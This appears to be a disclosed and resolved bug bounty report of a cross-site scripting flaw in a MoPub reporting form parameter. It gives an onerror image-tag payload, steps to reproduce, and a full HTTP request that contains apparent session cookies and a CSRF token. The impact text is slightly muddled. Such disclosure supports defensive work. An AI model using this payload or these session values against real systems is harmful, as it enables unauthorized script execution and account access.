Loading HuntDB...

XSS on https://app.mopub.com/reports/custom/add/ [new-d1]

X
X (Formerly Twitter)
Submitted None
Reported by c00lbugs

Vulnerability Details

Technical details and impact analysis

**Parameter** new-d1 **Payload** </img><img src=x onerror=alert(domain)> **Steps to reproduce** 1. Go to URL: https://app.mopub.com/reports/custom/add/ 2. Start burp suite proxy, intercept on. 4. Enter payload in vulnerable parameter. 3. click on Run and Save button. 4. You will see java-script getting executed. ##POST Request ``` POST /reports/custom/add/ HTTP/1.1 Host: app.mopub.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://app.mopub.com/reports/custom/ X-CSRFToken: ITzZsPAjFJeRBqKUKodU5C4w2lu2x5MG7Gec9L8jtqMOVilWX7gPTxwsXcgIloIR X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------200821510612490 Content-Length: 1690 Connection: close Cookie: _gcl_au=1.1.1687186367.1563287045; _ga=GA1.2.1543739358.1563287048; csrftoken=ITzZsPAjFJeRBqKUKodU5C4w2lu2x5MG7Gec9L8jtqMOVilWX7gPTxwsXcgIloIR; mp__mixpanel=%7B%22distinct_id%22%3A%20%2216bfb2ba1103c5-0143fdd5f3a3c58-4c312f7f-e1000-16bfb2ba111485%22%2C%22%24device_id%22%3A%20%2216bfb2ba1103c5-0143fdd5f3a3c58-4c312f7f-e1000-16bfb2ba111485%22%2C%22accountKey%22%3A%20%22%22%2C%22accessLevel%22%3A%20%22%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fwww.mopub.com%2F%22%2C%22%24initial_referring_domain%22%3A%20%22www.mopub.com%22%7D; mp_mixpanel__c=1; sessionid=p49r0bbeqb3laimfoii6vcny4yxbv6ww; mp_c99579c4804fba6b8aeed7a911581652_mixpanel=%7B%22distinct_id%22%3A%20%22d897f99976a646f5a619e52ed44bbb80%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fapp.mopub.com%2Faccount%2Flogin%2F%3Fnext%3D%2Fdashboard%2F%22%2C%22%24initial_referring_domain%22%3A%20%22app.mopub.com%22%2C%22accessLevel%22%3A%20%22member%22%2C%22accountKey%22%3A%20%22aeb905f4d0984a02be8a00d27aae73df%22%2C%22__mps%22%3A%20%7B%7D%2C%22__mpso%22%3A%20%7B%7D%2C%22__mpus%22%3A%20%7B%7D%2C%22__mpa%22%3A%20%7B%7D%2C%22__mpu%22%3A%20%7B%7D%2C%22__mpr%22%3A%20%5B%5D%2C%22__mpap%22%3A%20%5B%5D%2C%22%24user_id%22%3A%20%22d897f99976a646f5a619e52ed44bbb80%22%2C%22%24had_persisted_distinct_id%22%3A%20true%2C%22%24device_id%22%3A%20%22285f16e8e3a64ffc9bcc629faccb3d23%22%7D -----------------------------200821510612490 Content-Disposition: form-data; name="new-saved" on -----------------------------200821510612490 Content-Disposition: form-data; name="new-name" hello xss -----------------------------200821510612490 Content-Disposition: form-data; name="new-interval" yesterday -----------------------------200821510612490 Content-Disposition: form-data; name="new-start" 09/10/2019 -----------------------------200821510612490 Content-Disposition: form-data; name="new-end" 09/10/2019 -----------------------------200821510612490 Content-Disposition: form-data; name="new-sched_interval" none -----------------------------200821510612490 Content-Disposition: form-data; name="new-recipients" [email protected] -----------------------------200821510612490 Content-Disposition: form-data; name="new-d1" app</img><img src=x onerror=alert(domain)> -----------------------------200821510612490 Content-Disposition: form-data; name="new-d2" -----------------------------200821510612490 Content-Disposition: form-data; name="new-show_attempts_or_reqs" on -----------------------------200821510612490 Content-Disposition: form-data; name="new-show_impressions" on -----------------------------200821510612490 Content-Disposition: form-data; name="new-show_clicks" on -----------------------------200821510612490 Content-Disposition: form-data; name="new-show_revenue" on -----------------------------200821510612490 Content-Disposition: form-data; name="new-show_ctr" on -----------------------------200821510612490 Content-Disposition: form-data; name="new-show_conversions" on -----------------------------200821510612490-- ``` {F580318} {F580319} {F580316} {F580317} ## Impact Cross-site scripting is a flaw that allows users to inject HTML or JavaScript code into a page enabling arbitrary input. There are two main variants of XSS, stored and reflected, DOM.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted